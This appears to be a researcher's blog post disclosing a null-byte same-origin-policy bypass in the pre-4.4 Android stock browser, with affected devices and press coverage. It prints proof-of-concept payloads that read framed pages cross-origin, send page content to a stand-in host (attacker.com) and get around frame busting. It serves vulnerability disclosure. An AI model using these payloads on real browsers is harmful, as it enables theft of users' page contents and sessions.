<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" height="150" width="320" /></a></div>
<h4>
Introduction</h4>
Same Origin Policy (SOP) is one of the most important security mechanisms applied in modern browsers. The basic idea behind the SOP is that JavaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of scheme, domain and port, with the port being an exception in IE. There are some exceptions to the SOP, such as the location property and objects with a src attribute. However, the fundamental rule is that different origins should not be able to access each other's properties.<br />
<a name='more'></a><br />
<h4>
SOP Bypass</h4>
A SOP bypass occurs when sitea.com is somehow able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and its potential impact, browsers have a very strict model pertaining to it, and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability I found on my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony Xperia Tipo, Samsung Galaxy, HTC Wildfire, Motorola etc. are also affected. To the best of my knowledge, the issue occurred due to improper handling of null bytes by the URL parser. <br />
<u><br /></u>
<u><b>Update: </b>Other folks have verified this issue to work under Android browser < 4.4. Ref - <a href="https://github.com/rapid7/metasploit-framework/pull/3759" rel="nofollow" target="_blank">https://github.com/rapid7/metasploit-framework/pull/3759</a></u><br />
<br />
The following is a proof of concept:<br />
<h4>
Proof Of Concept </h4>
<blockquote class="tr_bq">
<iframe name="test" src="http://www.rhainfosec.com"></iframe><br />
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.domain)','test')"></blockquote>
<br />
As you can see, the code tries to access the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any modern browser, it returns an error similar to the following, as attacker.com should not be able to access the document.domain property of rhainfosec.com.<br />
<blockquote class="tr_bq">
Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match.</blockquote>
<br />
However, running it in the default browser of any of the vulnerable smartphones alerts the document.domain property, indicating that the SOP failed to restrict access to the document.domain property of a site at a different origin.<br />
<br />
I created the following POC, so you can mess around with some stuff:<br />
<h4>
Reading the response</h4>
You can read the response of any page by accessing the document.body.innerHTML property.<br />
<br />
<blockquote class="tr_bq">
<iframe name="test" src="http://www.rhainfosec.com"></iframe><br />
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"></blockquote>
<div>
<h4>
Reading the response and sending it to an attackers domain</h4>
In a real-world situation an attacker would send the response to a domain under their control. </div>
<div>
<b><br /></b></div>
<div>
<blockquote class="tr_bq">
<iframe name="test" src="http://www.rhainfosec.com"></iframe><br />
<input type=button value="test" onclick="window.open('\u0000javascript:var i=new Image();i.src=\'//attacker.com?\'+document.body.innerHTML;document.body.appendChild(i);','test')"></blockquote>
<div>
<h4>
Bypassing Frame Busting Code</h4>
A lot of websites still use frame-busting code to prevent the page from being framed, and the SOP bypass described here only works when the site can be framed. Where a site uses frame-busting code, we can bypass it using the sandbox attribute that was introduced as part of the HTML5 specification.<br />
<br /></div>
<div>
<blockquote class="tr_bq">
<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe><br />
<input type=button value="test" onclick="window.open('\u0000javascript:var i=new Image();i.src=\'//attacker.com?\'+document.body.innerHTML;document.body.appendChild(i);','test')"></blockquote>
<br />
<b>Update: </b>A Metasploit module has been released by jvennix-r7 which also supports an X-Frame-Options bypass, making it a completely universal exploit. <b>Ref - <a href="https://github.com/rapid7/metasploit-framework/pull/3759" rel="nofollow" target="_blank">https://github.com/rapid7/metasploit-framework/pull/3759</a></b></div>
</div>
<div>
<div>
<h4>
Affected Versions</h4>
The initial tests were carried out on Android browser 4.2.1 (Qmobile) and below, and later verified on the Galaxy S3, HTC Wildfire, Sony Xperia, Qmobile etc.<br />
<br />
The following are some of the smartphones I tested with browserstack.com.<br />
<h4>
Samsung Galaxy S3</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoqQAJZIz-1PzksM_gVNpojgnOt5locM1g-Gr7q2HHr93OpMeefbdU6v8xss0M5zK46W5a-7eSKXAytb3lWKkNnFOhzPneBw06D0ET2AMh9cjQEsqECnJgAo21GfovFTusnGQYv3HuNs/s1600/aaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoqQAJZIz-1PzksM_gVNpojgnOt5locM1g-Gr7q2HHr93OpMeefbdU6v8xss0M5zK46W5a-7eSKXAytb3lWKkNnFOhzPneBw06D0ET2AMh9cjQEsqECnJgAo21GfovFTusnGQYv3HuNs/s1600/aaa.png" height="640" width="330" /></a></div>
<b><br /></b></div>
</div>
<h4>
Motorola Razr</h4>
<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2UbDHqfKacHKLyIIcqYTuBhM42mOIp0A_GcAbnMskY-c9CJpwilhHFwnsDDVnqNyeOfUSaQ9t7IVCh4xFqSRzqjpyTJzqsiFm90in5YqOG75ZQGAATanQeyGDjFe4rFH0cmcGqhkGWTA/s1600/aa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2UbDHqfKacHKLyIIcqYTuBhM42mOIp0A_GcAbnMskY-c9CJpwilhHFwnsDDVnqNyeOfUSaQ9t7IVCh4xFqSRzqjpyTJzqsiFm90in5YqOG75ZQGAATanQeyGDjFe4rFH0cmcGqhkGWTA/s1600/aa.png" height="640" width="342" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Sony Xperia Tipo</h4>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrb2w86od3v1QUWcfbW-J2-QHafcnP9FwcGF_m6UOCWYgCs5UvID6wibi8Ib4GoAxV_mhXrsr51EMLWM94R384P_kwYuwK5EwPZF2kqQku27ldLLwLV03rp5o6eH4h2mD-O2DxTTS6nE/s1600/aaaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrb2w86od3v1QUWcfbW-J2-QHafcnP9FwcGF_m6UOCWYgCs5UvID6wibi8Ib4GoAxV_mhXrsr51EMLWM94R384P_kwYuwK5EwPZF2kqQku27ldLLwLV03rp5o6eH4h2mD-O2DxTTS6nE/s1600/aaaa.png" height="640" width="364" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<h4>
HTC Evo 3D and Wildfire </h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhF-PqtaE3yZ53wT6p4yy9uFTPiTnhfAKuYN5SnSEnopVwp4kISmjjq-ABUEAvL0_lfSIJu0R_lejo-rGQlXOdCNnaN5rMVQxidi9HkZlveK4Tgks5MSC4_pITKj8tOw3V_rcF4MwsWY/s1600/htc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhF-PqtaE3yZ53wT6p4yy9uFTPiTnhfAKuYN5SnSEnopVwp4kISmjjq-ABUEAvL0_lfSIJu0R_lejo-rGQlXOdCNnaN5rMVQxidi9HkZlveK4Tgks5MSC4_pITKj8tOw3V_rcF4MwsWY/s1600/htc.png" height="640" width="342" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Hope you enjoyed it. Until next time, leave your comments. </div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Updates</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>Haru Sugiyama has found an additional technique to read local files using this trick. To learn about it, please visit <a href="http://t.co/mGoVU1RWjf">http://t.co/mGoVU1RWjf</a></li>
<li>Posted about a second SOP bypass vulnerability - <a href="http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html" rel="nofollow" target="_blank">http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html</a></li>
<li>A Content Security Policy bypass in browsers prior to 4.4, also abusing null bytes, was posted here - https://twitter.com/AndroidTamer/status/521494552574582784</li>
</ul>
</div>
<h4>
Press Coverage</h4>
http://threatpost.com/flaw-in-android-browser-allows-same-origina-policy-bypass/108265#comment-317786<br />
<br />
https://showyou.com/v/y-yY23sS6DoEs/android-browser-vulnerability-security-now-473<br />
<br />
https://securitystreet.jive-mobile.com/#jive-document?content=%2Fapi%2Fcore%2Fv2%2Fposts%2F6804<br />
<br />
http://www.theregister.co.uk/2014/09/16/three_quarters_of_droid_phones_open_to_web_page_spy_bug/<br />
<br />
http://linustechtips.com/main/topic/216087-metasploit-major-android-bug-is-a-privacy-disaster-cve-2014-6041/<br />
<br />
http://nakedsecurity.sophos.com/2014/09/16/shocking-android-browser-bug-could-be-a-privacy-disaster-heres-how-to-fix-it/<br />
<br />
http://www.forbes.com/sites/thomasbrewster/2014/09/16/widespread-android-vulnerability-a-privacy-disaster-claim-researchers/<br />
<br />
http://www.securityweek.com/dangerous-same-origin-policy-bypass-flaw-found-android-browser<br />
<br />
http://www.computerworld.com/article/2684059/many-android-devices-vulnerable-to-session-hijacking-through-the-default-browser.html<br />
<br />
http://gadgets.ndtv.com/mobiles/news/android-browser-security-hole-affects-millions-of-users-says-expert-592578<br />
<br />
http://www.bostonglobe.com/business/2014/09/15/rapid-boston-finds-android-flaw/JJ9iHJB6YTcs10a7O9TjpN/story.html<br />
<br />
http://www.digit.in/mobile-phones/android-security-flaw-affects-millions-of-users-23921.html<br />
<br />
http://www.phonearena.com/news/New-Android-bug-called-a-privacy-disaster_id60750<br />
<br />
http://www.scmagazine.com/android-bug-allowing-sop-bypass-a-privacy-disaster-researcher-warns/article/371917/<br />
<br />
http://arstechnica.com/security/2014/09/android-browser-flaw-a-privacy-disaster-for-half-of-android-users/<br />
<br />
http://thehackernews.com/2014/09/new-android-browser-vulnerability-is.html<br />
<br />
http://xakep.ru/news/aosp-browser-sop/<br />
<br />
http://blog.trendmicro.com/trendlabs-security-intelligence/same-origin-policy-bypass-vulnerability-has-wider-reach-than-thought/<br />
<br />
http://daily.urdupoint.com/livenews/2014-09-17/news-303641.html<br />
<br />
http://dailypakistan.com.pk/daily-bites/17-Sep-2014/144263<br />
<br />
http://e.jang.com.pk/09-24-2014/karachi/page16.asp<br />
<br />
http://tribune.com.pk/story/764713/online-security-pakistani-helps-google-avoid-privacy-disaster/<br />
<br />
http://www.dawn.com/news/1133178/pakistani-researcher-reveals-privacy-flaw-in-android-browsers <br />
<br />
http://tribune.com.pk/story/764925/credit-to-our-white-hats/<br />
<br />
http://propakistani.pk/2014/09/23/pakistani-researcher-helps-google-preventing-massive-security-disaster/<br />
<br />
http://www.makeuseof.com/tag/this-android-browser-bug-will-make-you-upgrade-to-kitkat/</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/android-browser-same-origin-policy.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com15